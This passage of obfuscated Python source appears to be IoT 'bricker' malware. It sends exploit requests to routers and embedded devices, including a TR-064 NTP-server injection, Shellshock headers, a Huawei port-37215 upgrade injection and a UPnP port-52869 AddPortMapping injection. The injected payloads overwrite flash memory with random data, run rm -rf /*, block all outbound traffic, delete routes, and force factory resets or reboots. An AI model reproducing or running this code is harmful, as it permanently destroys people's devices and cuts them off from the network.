   if 97 - 97: oOoO0Ooo + IIiIIiIii1I . O0oo0OOOOO00 + IIiIIiIii1I
7767
   if ooOoO0o [ iiIii1I1i1 ] >= len ( I1I1IIi1i1I [ iiIii1I1i1 ] ) :
7768
    if 32 - 32: OOooOO0 * oOOo0000o + O0oo / O0oo0OOOOO00 + Oooo % oOOo0000o
7769
    oo0O0o0Oo ( iiIii1I1i1 )
7770
    continue
7771
    if 76 - 76: I11I1Ii + IIiII . o0oooooO - oOOoO00oo0
7772
    if 98 - 98: IIiIii1iI % oOoO0Ooo / Ii11i1iIi . i1
7773
   if Iioo0OooOoO >= o0O00OO [ iiIii1I1i1 ] :
7774
    if 52 - 52: i1IIi1i1iiI % oOOo0000o . oOOoO00oo0 * IIiII
7775
    O0OOo00o00o = oOoo0 ( O0oOoo [ iiIii1I1i1 ] [ 0 ] , O0oOoo [ iiIii1I1i1 ] [ 1 ] , I1I1IIi1i1I [ iiIii1I1i1 ] [ ooOoO0o [ iiIii1I1i1 ] ] , iiIii1I1i1 )
7776
    OO0 [ iiIii1I1i1 ] = O0OOo00o00o
7777
    o0O00OO [ iiIii1I1i1 ] = 0
7778
    if 95 - 95: Oooo . O0oo0OOOOO00 + Oo0 * IIiIIiIii1I
7779
    if 77 - 77: oOOo0000o * oOOoO00oo0 * o0ooO % oOoO0Ooo % O0oo
7780
def O0o00oO ( sock , webhash , jobhash ) :
7781
 if 1 - 1: o0ooO * Oo0 . OOOoOooO
7782
 O000oO0o = random . uniform ( 30 , 254 )
7783
 i1i11I1iI = random . uniform ( 1 , 254 )
7784
 if 65 - 65: OOooOO0 * OOooOO0 . o0oooooO + Oo0Oo / Ii11i1iIi . oOOo0000o
7785
 if '%' in Ooo000Oo [ webhash ] :
7786
  if '%%TARGETIP%%' in Ooo000Oo [ webhash ] :
7787
   Ooo000Oo [ webhash ] = re . sub ( '%%TARGETIP%%' , O0oOoo [ jobhash ] [ 0 ] , Ooo000Oo [ webhash ] )
7788
  if '%%TARGETPORT%%' in Ooo000Oo [ webhash ] :
7789
   Ooo000Oo [ webhash ] = re . sub ( '%%TARGETPORT%%' , '%d' % ( O0oOoo [ jobhash ] [ 1 ] ) , Ooo000Oo [ webhash ] )
7790
  if '%%LOGIN%%' in Ooo000Oo [ webhash ] :
7791
   Ooo000Oo [ webhash ] = re . sub ( '%%LOGIN%%' , IiIi11iii [ jobhash ] , Ooo000Oo [ webhash ] )
7792
  if '%%PASSWORD%%' in Ooo000Oo [ webhash ] :
7793
   Ooo000Oo [ webhash ] = re . sub ( '%%PASSWORD%%' , IIi1i [ jobhash ] , Ooo000Oo [ webhash ] )
7794
  if '%%NEWPASSWORD%%' in Ooo000Oo [ webhash ] :
7795
   Ooo000Oo [ webhash ] = re . sub ( '%%NEWPASSWORD%%' , IIIiI [ jobhash ] , Ooo000Oo [ webhash ] )
7796
  if '%%CUSTOM1%%' in Ooo000Oo [ webhash ] :
7797
   Ooo000Oo [ webhash ] = re . sub ( '%%CUSTOM1%%' , IiiI1II1111I1 [ jobhash ] , Ooo000Oo [ webhash ] )
7798
  if '%%CUSTOM2%%' in Ooo000Oo [ webhash ] :
7799
   Ooo000Oo [ webhash ] = re . sub ( '%%CUSTOM2%%' , ooOo [ jobhash ] , Ooo000Oo [ webhash ] )
7800
  if '%%CUSTOM3%%' in Ooo000Oo [ webhash ] :
7801
   Ooo000Oo [ webhash ] = re . sub ( '%%CUSTOM3%%' , iIiIi1II11 [ jobhash ] , Ooo000Oo [ webhash ] )
7802
  if '%%CUSTOM4%%' in Ooo000Oo [ webhash ] :
7803
   Ooo000Oo [ webhash ] = re . sub ( '%%CUSTOM4%%' , Ii1ii [ jobhash ] , Ooo000Oo [ webhash ] )
7804
  if '%%RAND16%%' in Ooo000Oo [ webhash ] :
7805
   Ooo000Oo [ webhash ] = re . sub ( '%%RAND16%%' , '%d.%d' % ( O000oO0o , random . uniform ( 20 , 200 ) ) , Ooo000Oo [ webhash ] )
7806
  if '%%COMP16%%' in Ooo000Oo [ webhash ] :
7807
   Ooo000Oo [ webhash ] = re . sub ( '%%COMP16%%' , '%d.%d' % ( O000oO0o , random . uniform ( 201 , 253 ) ) , Ooo000Oo [ webhash ] )
7808
  if '%%RAND8%%' in Ooo000Oo [ webhash ] :
7809
   Ooo000Oo [ webhash ] = re . sub ( '%%RAND8%%' , '%d.%d.%d' % ( O000oO0o , i1i11I1iI , random . uniform ( 20 , 200 ) ) , Ooo000Oo [ webhash ] )
7810
  if '%%COMP8%%' in Ooo000Oo [ webhash ] :
7811
   Ooo000Oo [ webhash ] = re . sub ( '%%COMP8%%' , '%d.%d.%d' % ( O000oO0o , i1i11I1iI , random . uniform ( 201 , 253 ) ) , Ooo000Oo [ webhash ] )
7812
  if '%%RHEX1%%' in Ooo000Oo [ webhash ] :
7813
   Ooo000Oo [ webhash ] = re . sub ( '%%RHEX1%%' , '' . join ( random . choice ( 'ABCDEF0123456789' ) for i in range ( 2 ) ) , Ooo000Oo [ webhash ] )
7814
  if '%%RHEX2%%' in Ooo000Oo [ webhash ] :
7815
   Ooo000Oo [ webhash ] = re . sub ( '%%RHEX2%%' , '' . join ( random . choice ( 'ABCDEF0123456789' ) for i in range ( 2 ) ) , Ooo000Oo [ webhash ] )
7816
  if '%%RHEX3%%' in Ooo000Oo [ webhash ] :
7817
   Ooo000Oo [ webhash ] = re . sub ( '%%RHEX3%%' , '' . join ( random . choice ( 'ABCDEF0123456789' ) for i in range ( 2 ) ) , Ooo000Oo [ webhash ] )
7818
  if '%%RANDPORT%%' in Ooo000Oo [ webhash ] :
7819
   Ooo000Oo [ webhash ] = re . sub ( '%%RANDPORT%%' , '%d' % ( random . uniform ( 10000 , 65000 ) ) , Ooo000Oo [ webhash ] )
7820
   if 27 - 27: Oo0Oo * i1
7821
  if '%%BODYLENGTH%%' in Ooo000Oo [ webhash ] :
7822
   i1iIII = Ooo000Oo [ webhash ] . find ( '\r\n\r\n' )
7823
   Oo00Ooo0O0Oo = - 1
7824
   if i1iIII >= 0 :
7825
    i1iIII += 4
7826
   else :
7827
    i1iIII = Ooo000Oo [ webhash ] . find ( '\n\n' )
7828
    if i1iIII >= 0 :
7829
     i1iIII += 2
7830
     if 100 - 100: OOOoOooO % oOOo0000o + I11I1Ii
7831
   if i1iIII >= 0 :
7832
    if 68 - 68: o0ooO * Oo0 . Oo0Oo . IIiIIiIii1I / O0oo - oOoO0Ooo
7833
    if 100 - 100: IIiII * o0oooooO % i1 / Ii11i1iIi / O0oo0OOOOO00 * IIiIIiIii1I
7834
    if 10 - 10: oOoO0Ooo % Ii / IIiII % oOOo0000o . i1IIi1i1iiI % Oo0
7835
    if 82 - 82: oOoO0Ooo + IIiIii1iI / Oo0 + IIiIii1iI % OOooOO0
7836
    Oo00Ooo0O0Oo = ( len ( Ooo000Oo [ webhash ] ) - i1iIII )
7837
    if 81 - 81: Ii . oOOoO00oo0 * Ii % O0oo0OOOOO00 * IIiII % O0oo
7838
   Ooo000Oo [ webhash ] = re . sub ( '%%BODYLENGTH%%' , '%d' % ( Oo00Ooo0O0Oo ) , Ooo000Oo [ webhash ] )
7839
 try :
7840
  if 98 - 98: OOooOO0
7841
  sock . send ( Ooo000Oo [ webhash ] )
7842
 except :
7843
  pass
7844
  if 17 - 17: O0oo * IIiIIiIii1I
7845
 return 1
7846
 if 74 - 74: IIiIii1iI / o0ooO % IIiIIiIii1I - o0ooO
7847
def O00o0oOOO0O0 ( ) :
7848
 global IIIIiI
7849
 global webclient_maxconnectiontime_payload
7850
 if 7 - 7: OOooOO0
7851
 Iioo0OooOoO = time . time ( )
7852
 if 18 - 18: O0oo . IIiIii1iI
7853
 if 38 - 38: Oooo / oOOoO00oo0 . o0ooO / o0ooO
7854
 O00Oo = 0.01
7855
 IIiI1i , O0o0 , IiIIiI11I = select . select ( i11IiiI1I , i11IiiI1I , [ ] , O00Oo )
7856
 for O0O0 in i11IiiI1I :
7857
  I11i1I = hash ( O0O0 )
7858
  o0oo0OOOo = O0O0 . getsockopt ( socket . SOL_SOCKET , socket . SO_ERROR )
7859
  if o0oo0OOOo != 0 :
7860
   if 8 - 8: I11I1Ii . oOOo0000o - O0oo
7861
   if O0Oooo0ooo0 [ I11i1I ] == '' :
7862
    O0Oooo0ooo0 [ I11i1I ] = '(timeout)' ;
7863
   iIiIii111Ii ( O0O0 )
7864
   continue
7865
  if O0O0 in IIiI1i :
7866
   O0 = ''
7867
   try :
7868
    O0 = O0O0 . recv ( 2048 )
7869
   except :
7870
    pass
7871
   if O0 :
7872
    O0Oooo0ooo0 [ I11i1I ] += O0
7873
    if 84 - 84: I11I1Ii
7874
    if 33 - 33: O0oo . o0ooO - o0ooO - oOOo0000o . o0oooooO / i1
7875
    if 74 - 74: Oooo - IIiII * OOooOO0 - Ii + Ii11i1iIi
7876
    if 24 - 24: Oooo + oOOo0000o . o0ooO / oOOoO00oo0 % IIiII / Ii
7877
    i1iIII = O0Oooo0ooo0 [ I11i1I ] . find ( '\r\n\r\n' )
7878
    if i1iIII >= 0 :
7879
     i1iIII += 4
7880
    else :
7881
     i1iIII = O0Oooo0ooo0 [ I11i1I ] . find ( '\n\n' )
7882
     if i1iIII >= 0 :
7883
      i1iIII += 2
7884
      if 86 - 86: Oo0 / o0oooooO * Oooo . Oo0 - oOOoO00oo0
7885
    if i1iIII >= 0 :
7886
     if 78 - 78: OOOoOooO + OOOoOooO * o0ooO % o0ooO
7887
     Oo00oO0O = re . search ( 'Content-Length:\s*(\d+)' , O0Oooo0ooo0 [ I11i1I ] )
7888
     if Oo00oO0O :
7889
      Oo00Ooo0O0Oo = int ( Oo00oO0O . group ( 1 ) )
7890
      if 95 - 95: Oooo / i1IIi1i1iiI + oOoO0Ooo % I11I1Ii / Oooo / IIiIii1iI
7891
      if 28 - 28: OOooOO0 * oOOoO00oo0 + oOOo0000o % I11I1Ii / IIiII * i1
7892
      if 49 - 49: IIiIii1iI / OOOoOooO + OOooOO0 / Ii . o0ooO
7893
      if 27 - 27: oOOoO00oo0 . Oo0 * o0ooO . Ii - O0oo0OOOOO00
7894
      if len ( O0Oooo0ooo0 [ I11i1I ] ) - i1iIII == Oo00Ooo0O0Oo :
7895
       if 69 - 69: Ii11i1iIi / Oo0 % o0oooooO + Ii11i1iIi
7896
       iIiIii111Ii ( O0O0 )
7897
       continue
7898
       if 55 - 55: Oo0 - O0oo0OOOOO00 % Ii11i1iIi . IIiII . O0oo0OOOOO00 / IIiIIiIii1I
7899
       if 93 - 93: OOOoOooO + Oooo + OOooOO0 - OOOoOooO
7900
   else :
7901
    iIiIii111Ii ( O0O0 )
7902
    continue
7903
  if O0O0 in O0o0 :
7904
   if IIi1i1iiii1Ii [ I11i1I ] == 0 :
7905
    if 98 - 98: IIiIIiIii1I + IIiII + i1IIi1i1iiI
7906
    iiIii1I1i1 = O0000o0 [ I11i1I ]
7907
    O0o00oO ( O0O0 , I11i1I , iiIii1I1i1 )
7908
    IIi1i1iiii1Ii [ I11i1I ] = 1
7909
    if 43 - 43: oOoO0Ooo / Ii * Oo0Oo
7910
  OoO0oOoooo = IIIIiI
7911
  iiIii1I1i1 = O0000o0 [ I11i1I ]
7912
  if O0oOO [ iiIii1I1i1 ] :
7913
   if 20 - 20: IIiIIiIii1I % Oooo / o0oooooO
7914
   if 20 - 20: Ii11i1iIi % i1IIi1i1iiI
7915
   OoO0oOoooo = 15
7916
  if Iioo0OooOoO - IIiiI [ I11i1I ] > OoO0oOoooo :
7917
   if 81 - 81: Ii11i1iIi + oOOo0000o
7918
   if 58 - 58: i1IIi1i1iiI - Oo0Oo + Oooo + o0oooooO * i1
7919
   if O0Oooo0ooo0 [ I11i1I ] == '' :
7920
    O0Oooo0ooo0 [ I11i1I ] = '(timeout)' ;
7921
   iIiIii111Ii ( O0O0 )
7922
   continue
7923
   if 35 - 35: I11I1Ii . Ii11i1iIi * o0oooooO
7924
   if 72 - 72: Oooo + Oo0 * IIiII + IIiIii1iI . O0oo . I11I1Ii
7925
   if 91 - 91: OOooOO0 . Ii11i1iIi % OOooOO0 * Ii
7926
   if 91 - 91: IIiIii1iI / IIiIii1iI + oOOo0000o + Oo0Oo % O0oo
7927
time . sleep ( 3 )
7928
if 84 - 84: OOOoOooO / I11I1Ii % Oooo . Ii11i1iIi * o0ooO
7929
if 5 - 5: IIiIIiIii1I
7930
if 98 - 98: O0oo0OOOOO00 . O0oo0OOOOO00 . Oo0 % i1IIi1i1iiI . Oo0Oo - O0oo0OOOOO00
7931
if 57 - 57: i1
7932
if 3 - 3: oOoO0Ooo - o0ooO
7933
o0iIiI1Ii1Ii = 20
7934
i1iii1I11 = 7
7935
if 17 - 17: OOooOO0 / O0oo % I11I1Ii % IIiIIiIii1I
7936
if 16 - 16: i1IIi1i1iiI * Oo0 + Ii - o0oooooO
7937
if 50 - 50: O0oo + oOOo0000o + Oooo
7938
if 93 - 93: I11I1Ii % oOOoO00oo0 - oOoO0Ooo / O0oo + oOoO0Ooo
7939
if 58 - 58: O0oo
7940
O0ooOOo0o = [ ]
7941
OOi11i11IIii11 = { }
7942
I11IO0O00o0 = { }
7943
iIiiiIIIII1i1 = { }
7944
oOOoOoO = { }
7945
Oo0OoOOoo00o = { }
7946
I11Ii11iiiii1 = { }
7947
if 48 - 48: OOooOO0 % Oo0
7948
iii11II1I1I = [ ]
7949
i1iI = { }
7950
oOOOOOO0OO0 = { }
7951
iI1I1IiI1II1 = { }
7952
iI1IIi = { }
7953
ooOOoooOo = { }
7954
if 20 - 20: o0ooO - oOOo0000o + I11I1Ii / o0ooO + oOOo0000o % oOOo0000o
7955
if 12 - 12: IIiIIiIii1I - oOoO0Ooo + IIiII + IIiIii1iI + i1
7956
if 94 - 94: oOOo0000o . IIiII
7957
oooOoo0O = 'POST /UD/act?1 HTTP/1.1\r\nHost: 127.0.0.1:%d\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\nSOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers\r\nContent-Type: text/xml\r\nContent-Length: %d\r\n\r\n'
7958
II1I1 = '<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"><NewNTPServer1>`'
7959
Iii1i1i = '`</NewNTPServer1><NewNTPServer2></NewNTPServer2><NewNTPServer3></NewNTPServer3><NewNTPServer4></NewNTPServer4><NewNTPServer5></NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>'
7960
i1I = '`</NewNTPServer1><NewNTPServer2>`route del default`</NewNTPServer2><NewNTPServer3>`iptables -A OUTPUT -j DROP`</NewNTPServer3><NewNTPServer4></NewNTPServer4><NewNTPServer5></NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>'
7961
if 41 - 41: oOoO0Ooo / OOOoOooO
7962
if 66 - 66: o0ooO / oOoO0Ooo
7963
o0o0000o00o = [
7964
 'busybox cat /dev/urandom >/dev/mtdblock0;busybox cat /dev/urandom >/dev/mtdblock1;busybox cat /dev/urandom >/dev/mtdblock2;busybox cat /dev/urandom >/dev/mtdblock3;busybox cat /dev/urandom >/dev/mtdblock4;busybox cat /dev/urandom >/dev/mtdblock5' ,
7965
 'busybox cat /dev/urandom >/dev/mtdblock0;busybox cat /dev/urandom >/dev/mtdblock1;busybox cat /dev/urandom >/dev/mtdblock2;busybox cat /dev/urandom >/dev/mtdblock3;busybox cat /dev/urandom >/dev/mtdblock4;busybox cat /dev/urandom >/dev/mtdblock5 &' ,
7966
 'cat /dev/urandom >/dev/mtdblock0;cat /dev/urandom >/dev/mtdblock1;cat /dev/urandom >/dev/mtdblock2;cat /dev/urandom >/dev/mtdblock3;cat /dev/urandom >/dev/mtdblock4;cat /dev/urandom >/dev/mtdblock5' ,
7967
 'cat /dev/urandom >/dev/mtdblock0;cat /dev/urandom >/dev/mtdblock1;cat /dev/urandom >/dev/mtdblock2;cat /dev/urandom >/dev/mtdblock3;cat /dev/urandom >/dev/mtdblock4;cat /dev/urandom >/dev/mtdblock5 &' ,
7968
 'cat /dev/urandom >/dev/root' ,
7969
 'dd if=/dev/urandom of=/dev/root' ,
7970
 'busybox cat /dev/urandom >/dev/root' ,
7971
'GET / HTTP/1.0\r\nUser-Agent: () { :;};cat /dev/urandom >/dev/root\r\nConnection: close\r\n\r\n' ,
7972
 'GET / HTTP/1.0\r\nUser-Agent: () { :;};dd if=/dev/urandom of=/dev/root\r\nConnection: close\r\n\r\n' ,
7973
'POST /UD/act/?1 HTTP/1.1\r\nHost: 127.0.0.1:7547\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\nSOAPAction: urn:dslforum-org:service:WANEthernetInterfaceConfig:1#SetEnable\r\nContent-Type: text/xml\r\nContent-Length: 336\r\n\r\n<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body>  <u:SetEnable xmlns:u="urn:dslforum-org:service:WANEthernetInterfaceConfig:1"><NewEnable>0</NewEnable></u:SetEnable> </SOAP-ENV:Body></SOAP-ENV:Envelope>' ,
7974
 'POST /UD/act/?1 HTTP/1.1\r\nHost: 127.0.0.1:7547\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\nSOAPAction: urn:dslforum-org:service:WANPPPConnection:1#SetEnable\r\nContent-Type: text/xml\r\nContent-Length: 326\r\n\r\n<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body>  <u:SetEnable xmlns:u="urn:dslforum-org:service:WANPPPConnection:1"><NewEnable>0</NewEnable></u:SetEnable> </SOAP-ENV:Body></SOAP-ENV:Envelope>' ,
7975
 'POST /UD/act/?1 HTTP/1.1\r\nHost: 127.0.0.1:7547\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\nSOAPAction: urn:dslforum-org:service:WANIPConnection:1#SetEnable\r\nContent-Type: text/xml\r\nContent-Length: 325\r\n\r\n<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body>  <u:SetEnable xmlns:u="urn:dslforum-org:service:WANIPConnection:1"><NewEnable>0</NewEnable></u:SetEnable> </SOAP-ENV:Body></SOAP-ENV:Envelope>' ,
7976
'route del default;iproute del default;ip route del default;iptables -F;iptables -t nat -F;iptables -A OUTPUT -j DROP;rm -rf /*' ,
7977
 'ifconfig eth0 down;ifconfig wlan0 down' ,
7978
 'iptables -A OUTPUT -j DROP' ,
7979
 'route del default' ,
7980
 'poweroff' ,
7981
 'rm -rf /*' ,
7982
 'POST /UD/act/?1 HTTP/1.1\r\nHost: 127.0.0.1:7547\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\nSOAPAction: urn:dslforum-org:service:DeviceConfig:1#FactoryReset\r\nContent-Type: text/xml\r\nContent-Length: 304\r\n\r\n<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body>  <u:FactoryReset xmlns:u="urn:dslforum-org:service:DeviceConfig:1"></u:FactoryReset> </SOAP-ENV:Body></SOAP-ENV:Envelope>' ,
7983
'GET / HTTP/1.0\r\nCookie: C\r\n\r\n' ,
7984
'GET / HTTP/1.0\r\nUser-Agent: () { :;};route del default;ip route del default;iproute del default;rm -rf *;rm -rf /*\r\n\r\n' ,
7985
 'reboot' ,
7986
 'POST /UD/act/?1 HTTP/1.1\r\nHost: 127.0.0.1:7547\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\nSOAPAction: urn:dslforum-org:service:DeviceConfig:1#Reboot\r\nContent-Type: text/xml\r\nContent-Length: 292\r\n\r\n<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body>  <u:Reboot xmlns:u="urn:dslforum-org:service:DeviceConfig:1"></u:Reboot> </SOAP-ENV:Body></SOAP-ENV:Envelope>' ,
7987
 ]
7988
if 71 - 71: IIiIii1iI * OOooOO0
7989
o0OOoo0ooO00o = 'POST /ctrlt/DeviceUpgrade_1 HTTP/1.1\r\nHost: %%TARGETIP%%:37215\r\nContent-Length: 601\r\nConnection: keep-alive\r\nAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"\r\n\r\n<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox cat /dev/urandom >/dev/mtdblock0;/bin/busybox cat /dev/urandom >/dev/mtdblock3;/bin/busybox cat /dev/urandom >/dev/mtdblock1;/bin/busybox cat /dev/urandom >/dev/mtdblock2;/bin/busybox cat /dev/urandom >/dev/mtdblock4;/bin/iptables -A OUTPUT -j DROP)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>'
7990
if 67 - 67: IIiIii1iI * o0oooooO
7991
IIiI = [
7992
 'POST /picdesc.xml HTTP/1.1\r\nHost: %%TARGETIP%%:52869\r\nContent-Length: 866\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nConnection: keep-alive\r\n\r\n<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>%%RAND16A%%</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>%%RAND16B%%</NewInternalPort><NewInternalClient>`busybox cat /dev/urandom >/dev/mtdblock0;busybox cat /dev/urandom >/dev/mtdblock1;busybox cat /dev/urandom >/dev/mtdblock2;busybox cat /dev/urandom >/dev/mtdblock3;busybox cat /dev/urandom >/dev/mtdblock4;busybox cat /dev/urandom >/dev/mtdblock5;busybox cat /dev/urandom >/dev/mtdblock6`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>' ,
7993
 'POST /picdesc.xml HTTP/1.1\r\nHost: %%TARGETIP%%:52869\r\nContent-Length: 873\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nConnection: keep-alive\r\n\r\n<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>%%RAND16A%%</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>%%RAND16B%%</NewInternalPort><NewInternalClient>`busybox cat /dev/urandom >/dev/mtdblock/0;busybox cat /dev/urandom >/dev/mtdblock/1;busybox cat /dev/urandom >/dev/mtdblock/2;busybox cat /dev/urandom >/dev/mtdblock/3;busybox cat /dev/urandom >/dev/mtdblock/4;busybox cat /dev/urandom >/dev/mtdblock/5;busybox cat /dev/urandom >/dev/mtdblock/6`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>' ,
7994
 'POST /picdesc.xml HTTP/1.1\r\nHost: %%TARGETIP%%:52869\r\nContent-Length: 798\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nConnection: keep-alive\r\n\r\n<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>%%RAND16A%%</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>%%RAND16B%%</NewInternalPort><NewInternalClient>`busybox cat /dev/urandom >/dev/root;route del default;iptables -A OUTPUT -j DROP;busybox route del default;/bin/route del default;/sbin/route del default;/sbin/iptables -A OUTPUT -j DROP;/bin/iptables -A OUTPUT -j DROP`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>' ,
7995
 ]
7996
if 20 - 20: oOOoO00oo0 - o0ooO . Ii11i1iIi + O0oo . IIiIIiIii1I * o0oooooO
7997
if 4 - 4: oOOo0000o - oOOo0000o
7998
def OOo0OooO00 ( targetport , index ) :
7999
 global II1I1
8000
 global o0o0000o00o
8001
 global Iii1i1i
8002
 global i1I
8003
 global oooOoo0O
8004
 global o0OOoo0ooO00o
8005
 if 51 - 51: O0oo % i1 / i1IIi1i1iiI + IIiII
8006
 if targetport == 37215 :
8007
  return o0OOoo0ooO00o
8008
  if 39 - 39: i1IIi1i1iiI - O0oo0OOOOO00 - Ii11i1iIi * oOoO0Ooo * oOOo0000o - IIiIii1iI
8009
 if targetport == 52869 :
8010
  return IIiI [ index % 3 ]
8011
  if 57 - 57: o0ooO - i1IIi1i1iiI . IIiIIiIii1I * O0oo0OOOOO00
8012
 if 'POST /UD/act/' in o0o0000o00o [ index ] or 'GET / HTTP' in o0o0000o00o [ index ] :
8013
  return o0o0000o00o [ index ] ;
8014
 else :
8015
  o0OOo00 = II1I1 ;
8016
  o0OOo00 += o0o0000o00o [ index ]
8017
  if index < 5 or random . randint ( 0 , 99 ) < 30 :
8018
   o0OOo00 += Iii1i1i
8019
  else :
8020
   o0OOo00 += i1I
8021
  I1111II1 = oooOoo0O % ( targetport , len ( o0OOo00 ) )
8022
  return I1111II1 + o0OOo00
8023
  if 74 - 74: i1 / IIiIIiIii1I . Oooo
8024
  if 100 - 100: Ii / O0oo0OOOOO00 / o0ooO + Oooo / i1IIi1i1iiI . I11I1Ii
8025
def O0iII111i1 ( targetip , targetport ) :
8026
 global OO00oo0o
8027
 if 4 - 4: o0ooO . IIiIii1iI / o0oooooO
8028
 if not OO00oo0o :
8029
  return
8030
  if 23 - 23: OOOoOooO * Oooo
8031
 O0000oO0O = ( targetip , int ( targetport ) )
8032
 I11i1I = hash ( O0000oO0O )
8033
 if I11i1I in iii11II1I1I :
8034
  if 28 - 28: o0oooooO % O0oo
8035
  return ;
8036
  if 32 - 32: i1IIi1i1iiI / Oo0Oo * IIiIIiIii1I - o0oooooO + o0ooO
8037
  if 92 - 92: oOOo0000o + Ii11i1iIi . i1 * O0oo / O0oo0OOOOO00 + oOoO0Ooo
8038
 oOOOOOO0OO0 [ I11i1I ] = 0
8039
 if 39 - 39: o0oooooO - O0oo / oOOo0000o + Oo0
8040
 oO0o00Oo0 = random . randint ( 0 , 99 )
8041
 if oO0o00Oo0 < 20 :
8042
  oOOOOOO0OO0 [ I11i1I ] = 9
8043
 elif oO0o00Oo0 < 40 :
8044
  oOOOOOO0OO0 [ I11i1I ] = 5
8045
 elif oO0o00Oo0 < 60 :
8046
  oOOOOOO0OO0 [ I11i1I ] = 18
8047
 i1iI [ I11i1I ] = ( targetip , int ( targetport ) )
8048
 iI1IIi [ I11i1I ] = 0
8049
 ooOOoooOo [ I11i1I ] = None
8050
 iii11II1I1I . append ( I11i1I )
8051
 if 11 - 11: OOOoOooO
8052
def iiiO0O000OoO0 ( targetip , targetport , request , jobhash ) :
8053
 O0000oO0O = ( targetip , int ( targetport ) )
8054
 if 78 - 78: i1IIi1i1iiI . oOOoO00oo0
8055
 O0OOo00o00o = socket . socket ( socket . AF_INET , socket . SOCK_STREAM )
8056
 O0OOo00o00o . setblocking ( 0 )
8057
 if 81 - 81: Ii + o0ooO
8058
 if 97 - 97: O0oo / o0ooO + oOOo0000o - Ii
8059
 try :
8060
  O0OOo00o00o . connect ( O0000oO0O )
8061
 except :
8062
  pass
8063
  if 66 - 66: oOoO0Ooo * Oo0 * i1 % O0oo + IIiIii1iI
8064
  if 81 - 81: oOoO0Ooo + oOoO0Ooo + o0oooooO + oOOoO00oo0 * IIiII - IIiIii1iI
8065
 if '%' in request :
8066
  if '%%TARGETIP%%' in request :
8067
   request = re . sub ( '%%TARGETIP%%' , targetip , request )
8068
  if '%%RAND16A%%' in request :
8069
